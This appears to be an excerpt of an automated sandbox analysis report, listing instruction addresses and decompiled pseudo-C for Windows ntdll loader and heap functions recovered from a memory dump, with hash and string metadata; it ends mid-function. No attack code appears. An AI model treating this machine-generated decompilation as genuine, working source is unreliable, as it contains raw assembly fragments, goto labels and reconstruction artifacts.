                                      0x019e184c
                                      0x019e1859
                                      0x019e1859
                                      0x019e185c
                                      0x00000000
                                      0x00000000
                                      0x019e1851
                                      0x019e1853
                                      0x019e1855
                                      0x019e1865
                                      0x019e1865
                                      0x019e1866
                                      0x019e1868
                                      0x019e1870
                                      0x00000000
                                      0x019e1870
                                      0x019e1857
                                      0x019e1857
                                      0x019e185e
                                      0x00000000
                                      0x019e16d2
                                      0x019e16d2
                                      0x019e16d5
                                      0x019e16d5
                                      0x019e16d8
                                      0x019e16da
                                      0x019e16dd
                                      0x019e16e0
                                      0x019e16e3
                                      0x019e16e5
                                      0x019e1808
                                      0x019e1808
                                      0x019e1809
                                      0x019e1812
                                      0x019e1817
                                      0x019e1817
                                      0x00000000
                                      0x019e1817
                                      0x019e16eb
                                      0x019e16ed
                                      0x00000000
                                      0x00000000
                                      0x019e16f6
                                      0x019e16f9
                                      0x019e16ff
                                      0x019e1701
                                      0x019e172c
                                      0x019e172c
                                      0x019e172f
                                      0x019e1732
                                      0x019e1734
                                      0x019e1737
                                      0x019e173b
                                      0x019e175e
                                      0x019e175e
                                      0x019e1761
                                      0x019e1764
                                      0x019e176d
                                      0x019e1774
                                      0x019e1777
                                      0x019e177a
                                      0x019e177c
                                      0x019e177f
                                      0x019e1781
                                      0x019e1781
                                      0x019e1784
                                      0x019e1784
                                      0x019e177f
                                      0x019e178c
                                      0x019e1791
                                      0x019e1796
                                      0x019e1799
                                      0x019e179c
                                      0x019e179e
                                      0x019e17a5
                                      0x019e17a9
                                      0x019e17c9
                                      0x019e17ce
                                      0x019e17ab
                                      0x019e17c1
                                      0x019e17c6
                                      0x019e17dc
                                      0x019e17e3
                                      0x019e17e8
                                      0x019e17ee
                                      0x019e17f1
                                      0x019e17f5
                                      0x019e17f7
                                      0x019e17fe
                                      0x019e17ff
                                      0x019e17ff
                                      0x019e17f5
                                      0x019e179c
                                      0x00000000
                                      0x019e1764
                                      0x019e1741
                                      0x019e1746
                                      0x019e1748
                                      0x00000000
                                      0x00000000
                                      0x019e1754
                                      0x00000000
                                      0x019e1754
                                      0x019e1703
                                      0x019e1710
                                      0x019e1710
                                      0x019e1713
                                      0x00000000
                                      0x00000000
                                      0x019e1708
                                      0x019e170a
                                      0x019e170c
                                      0x019e171c
                                      0x019e171c
                                      0x019e171d
                                      0x019e171f
                                      0x019e1727
                                      0x00000000
                                      0x019e1727
                                      0x019e170e
                                      0x019e170e
                                      0x019e1715
                                      0x00000000
                                      0x019e1715
                                      0x019e16cc
                                      0x01999a45
                                      0x01999a45
                                      0x01999a0e
                                      0x01999a1c
                                      0x01999a23
                                      0x019e167e
                                      0x019e167f
                                      0x019e1681
                                      0x019e1683
                                      0x019e1684
                                      0x00000000
                                      0x019e1684
                                      0x00000000
                                      0x01999aad
                                      0x01999aad
                                      0x01999ab0
                                      0x01999ab3
                                      0x01999ab3
                                      0x01999ab6
                                      0x00000000
                                      0x00000000
                                      0x01999ab8
                                      0x01999aba
                                      0x01999abc
                                      0x01999ac8
                                      0x01999ac8
                                      0x00000000
                                      0x01999abe
                                      0x01999abe
                                      0x01999ac0
                                      0x00000000
                                      0x01999ac0
                                      0x01999abc
                                      0x01999ad2
                                      0x00000000
                                      0x01999ad2
                                      0x01999aab

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                      • API String ID: 0-3178619729
                                      • Opcode ID: 2bcdae3a99f1d636b584a72bf3e3979f1981a7580c7edb9fb73014a878ad1051
                                      • Instruction ID: 62532e4e88939e0f9e66c1b3f0f55766f59cb49feab03d5106caea6acf38bbeb
                                      • Opcode Fuzzy Hash: 2bcdae3a99f1d636b584a72bf3e3979f1981a7580c7edb9fb73014a878ad1051
                                      • Instruction Fuzzy Hash: D122C0706002469FEB26CF2DC489B7ABBF9EF45705F18856DE84A8B342E775D881CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01988794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 83%
                                      			E01988794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0198934A() != 0) {
								_t159 = E019FA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1a65780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E019F5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1a65780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0198849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01988999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01988999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1a65c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1a65c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01992280(_t92, 0x1a686cc);
															_t94 = E01A49DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E019A61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1a65c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01988A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1a65c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1a65c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E019BF380(_t136, 0x1951184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01992280(_t108, 0x1a686cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E019A61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01A49D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0198FFB0(_t118, _t156, 0x1a686cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E019B9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                      0x01988799
                                      0x0198879d
                                      0x019887a1
                                      0x019887a3
                                      0x019887a8
                                      0x019887c3
                                      0x019887c3
                                      0x019887c8
                                      0x019887d1
                                      0x019887d4
                                      0x019887d8
                                      0x019887e5
                                      0x019887ec
                                      0x019d9bfe
                                      0x019d9c00
                                      0x019d9c02
                                      0x019d9c08
                                      0x019d9c0d
                                      0x019d9c0f
                                      0x019d9c14
                                      0x019d9c2d
                                      0x019d9c32
                                      0x019d9c37
                                      0x019d9c3a
                                      0x019d9c3c
                                      0x019d9c42
                                      0x019d9c42
                                      0x019d9c3c
                                      0x019d9c02
                                      0x019887da
                                      0x019887df
                                      0x019887e3
                                      0x00000000
                                      0x00000000
                                      0x019887e3
                                      0x019887f2
                                      0x00000000
                                      0x019887fb
                                      0x019887fd
                                      0x019887fe
                                      0x0198880e
                                      0x0198880f
                                      0x01988810
                                      0x01988814
                                      0x0198881a
                                      0x0198881c
                                      0x0198881f
                                      0x01988821
                                      0x01988822
                                      0x01988824
                                      0x01988826
                                      0x0198882c
                                      0x0198882e
                                      0x019d9c48
                                      0x019d9c48
                                      0x01988834
                                      0x01988834
                                      0x01988837
                                      0x00000000
                                      0x00000000
                                      0x01988837
                                      0x0198882e
                                      0x0198883d
                                      0x01988840
                                      0x01988843
                                      0x01988846
                                      0x01988849
                                      0x0198884c
                                      0x0198884e
                                      0x01988850
                                      0x01988852
                                      0x01988854
                                      0x01988857
                                      0x019888b4
                                      0x019888b6
                                      0x019888b6
                                      0x01988859
                                      0x01988859
                                      0x01988859
                                      0x01988861
                                      0x01988866
                                      0x0198886a
                                      0x0198893d
                                      0x01988941
                                      0x00000000
                                      0x01988947
                                      0x01988947
                                      0x0198894a
                                      0x0198894c
                                      0x00000000
                                      0x01988952
                                      0x01988955
                                      0x0198895a
                                      0x0198895d
                                      0x0198895d
                                      0x0198895f
                                      0x01988961
                                      0x01988961
                                      0x01988968
                                      0x00000000
                                      0x00000000
                                      0x0198896a
                                      0x0198896b
                                      0x0198896e
                                      0x00000000
                                      0x01988970
                                      0x01988970
                                      0x01988970
                                      0x01988970
                                      0x01988972
                                      0x01988972
                                      0x01988974
                                      0x00000000
                                      0x0198897a
                                      0x0198897a
                                      0x0198897d
                                      0x00000000
                                      0x01988983
                                      0x019d9c65
                                      0x019d9c6d
                                      0x019d9c72
                                      0x019d9c75
                                      0x019d9c75
                                      0x019d9c82
                                      0x019d9c86
                                      0x019d9c87
                                      0x019d9c88
                                      0x019d9c89
                                      0x019d9c8c
                                      0x019d9c90
                                      0x019d9c95
                                      0x019d9c97
                                      0x019d9ca0
                                      0x019d9ca3
                                      0x019d9ca9
                                      0x019d9ca9
                                      0x00000000
                                      0x019d9ca9
                                      0x019d9ca3
                                      0x00000000
                                      0x019d9c97
                                      0x0198897d
                                      0x00000000
                                      0x01988974
                                      0x01988988
                                      0x01988992
                                      0x01988996
                                      0x00000000
                                      0x01988996
                                      0x0198894c
                                      0x00000000
                                      0x01988870
                                      0x0198887b
                                      0x0198887d
                                      0x0198887f
                                      0x01988881
                                      0x01988884
                                      0x01988884
                                      0x01988886
                                      0x01988889
                                      0x0198888c
                                      0x0198888e
                                      0x01988891
                                      0x01988891
                                      0x01988898
                                      0x00000000
                                      0x00000000
                                      0x0198889a
                                      0x0198889b
                                      0x0198889e
                                      0x00000000
                                      0x00000000
                                      0x019888a0
                                      0x019888a8
                                      0x019888b0
                                      0x019888b2
                                      0x019888d3
                                      0x019888d5
                                      0x00000000
                                      0x019888d7
                                      0x019888db
                                      0x019888dc
                                      0x019888e0
                                      0x019888e8
                                      0x019888ee
                                      0x019888f0
                                      0x019888f3
                                      0x019888fc
                                      0x01988901
                                      0x01988906
                                      0x0198890c
                                      0x0198890c
                                      0x0198890f
                                      0x01988916
                                      0x01988917
                                      0x01988918
                                      0x01988919
                                      0x0198891a
                                      0x0198891f
                                      0x01988921
                                      0x019d9c52
                                      0x019d9c55
                                      0x019d9c5b
                                      0x019d9cac
                                      0x019d9cc0
                                      0x019d9cc0
                                      0x019d9c55
                                      0x01988927
                                      0x01988927
                                      0x0198892f
                                      0x01988933
                                      0x00000000
                                      0x019888f5
                                      0x019888f5
                                      0x00000000
                                      0x019888f7
                                      0x019888f7
                                      0x019888fa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x019888fa
                                      0x019888f5
                                      0x019888f3
                                      0x00000000
                                      0x019888d5
                                      0x00000000
                                      0x019888b2
                                      0x019888c9
                                      0x00000000
                                      0x019888c9
                                      0x0198887f
                                      0x0198886a
                                      0x01988857
                                      0x01988852
                                      0x019888bf
                                      0x019888bf
                                      0x019887aa
                                      0x019887ad
                                      0x019887ae
                                      0x019887b4
                                      0x019887b5
                                      0x019887b6
                                      0x019887b8
                                      0x019887bd
                                      0x019887c1
                                      0x019887f4
                                      0x019887fa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x019887c1
                                      0x00000000

                                      Strings
                                      • minkernel\ntdll\ldrsnap.c, xrefs: 019D9C28
                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 019D9C18
                                      • LdrpDoPostSnapWork, xrefs: 019D9C1E
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                      • API String ID: 2994545307-1948996284
                                      • Opcode ID: 38416af722b5322561e1622519b00fc5605fadec6c2dfd5ca8a80d78e10d6cb7
                                      • Instruction ID: f857666941f5b4f9299b12c2e6ff4b9be8d859f614ff3e7188d0b5372024f523
                                      • Opcode Fuzzy Hash: 38416af722b5322561e1622519b00fc5605fadec6c2dfd5ca8a80d78e10d6cb7
                                      • Instruction Fuzzy Hash: 12912771A10206EFEF18FF59D480ABAB7B9FF84315B844169D91DAB251D730ED01CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019AAC7B, Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 80%
                                      			E019AAC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E019CD5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x1a68a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E019B96E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E01A23C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E019B96E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E0197B150();
							} else {
								E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E0197B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E01A314FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E01997D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E01A31411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E01997D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E01A31411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                      0x019aac85
                                      0x019aac88
                                      0x019aac8a
                                      0x019aac8d
                                      0x019aac91
                                      0x019aac99
                                      0x019aac9c
                                      0x019e9f57
                                      0x019e9f5b
                                      0x019e9f60
                                      0x019e9f60
                                      0x019aaca8
                                      0x019aacae
                                      0x019aacda
                                      0x019aacde
                                      0x019aace8
                                      0x019aaceb
                                      0x019aacee
                                      0x00000000
                                      0x019aacee
                                      0x019aacf6
                                      0x019aacb0
                                      0x019aacb0
                                      0x019aacbb
                                      0x019aacbd
                                      0x019aacc0
                                      0x019aacc5
                                      0x019aadae
                                      0x019aadb4
                                      0x019aadb4
                                      0x019aacd4
                                      0x019aacd8
                                      0x019aacf9
                                      0x019aacff
                                      0x019aad04
                                      0x019aad08
                                      0x019aad09
                                      0x019aad10
                                      0x019aad12
                                      0x019aad18
                                      0x019e9f6f
                                      0x019e9f74
                                      0x019e9f76
                                      0x019e9f7c
                                      0x019e9f84
                                      0x019e9f88
                                      0x019e9f89
                                      0x019e9f90
                                      0x019e9f90
                                      0x019e9f76
                                      0x019aad1e
                                      0x019aad24
                                      0x019aad26
                                      0x019ea097
                                      0x019ea09b
                                      0x019ea0ba
                                      0x019ea0bf
                                      0x019ea09d
                                      0x019ea0b2
                                      0x019ea0b7
                                      0x019ea0c5
                                      0x019ea0c8
                                      0x019ea0cb
                                      0x019ea0d2
                                      0x00000000
                                      0x019aad2c
                                      0x019aad2c
                                      0x019aad2f
                                      0x019aad34
                                      0x019aad36
                                      0x019e9f97
                                      0x019e9f9a
                                      0x00000000
                                      0x00000000
                                      0x019e9fa9
                                      0x019aad3e
                                      0x019aad3e
                                      0x019aad41
                                      0x019e9fb3
                                      0x019e9fb9
                                      0x019e9fc0
                                      0x019e9fd0
                                      0x019e9fd0
                                      0x019e9fc0
                                      0x019aad4a
                                      0x019aad50
                                      0x019aad5c
                                      0x019aad62
                                      0x019aad68
                                      0x019aad6b
                                      0x019aad6d
                                      0x019e9fda
                                      0x019e9fdd
                                      0x00000000
                                      0x00000000
                                      0x019e9fec
                                      0x00000000
                                      0x019aad73
                                      0x019aad73
                                      0x019aad73
                                      0x019aad75
                                      0x019aad75
                                      0x019aad78
                                      0x019e9ff6
                                      0x019e9ffc
                                      0x019ea003
                                      0x019ea00e
                                      0x019ea010
                                      0x019ea01b
                                      0x019ea01b
                                      0x019ea01b
                                      0x019ea038
                                      0x019ea038
                                      0x019ea003
                                      0x019aad84
                                      0x019aad89
                                      0x019aad8c
                                      0x019aad8e
                                      0x019ea042
                                      0x019ea045
                                      0x00000000
                                      0x00000000
                                      0x019ea054
                                      0x00000000
                                      0x019aad94
                                      0x019aad94
                                      0x019aad94
                                      0x019aad96
                                      0x019aad96
                                      0x019aad99
                                      0x019ea063
                                      0x019ea065
                                      0x019ea070
                                      0x019ea070
                                      0x019ea070
                                      0x019ea08d
                                      0x019ea08d
                                      0x019aada4
                                      0x019aada6
                                      0x00000000
                                      0x019aada6
                                      0x019aad8e
                                      0x019aad6d
                                      0x019aad3c
                                      0x019aad3c
                                      0x00000000
                                      0x019aad3c
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x019aacd8

                                      Strings
                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 019EA0CD
                                      • HEAP: , xrefs: 019EA0BA
                                      • HEAP[%wZ]: , xrefs: 019EA0AD
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                      • API String ID: 0-1340214556
                                      • Opcode ID: b0f9fa4ca8039a22d6c0a6217e5500426c78be489e272f3d6baaf61b51b299a2
                                      • Instruction ID: bd69ffb7b6665bb229c4b827a2a0becc079377e907c314f29737a16bbe222b81
                                      • Opcode Fuzzy Hash: b0f9fa4ca8039a22d6c0a6217e5500426c78be489e272f3d6baaf61b51b299a2
                                      • Instruction Fuzzy Hash: 07812631600684EFE726CBACC988FA9BBF8FF05701F0405A5E589876A2D734ED44CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0199B73D, Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 74%
                                      			E0199B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E01A3A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x1a68748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E0197B150();
					} else {
						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E0197B150();
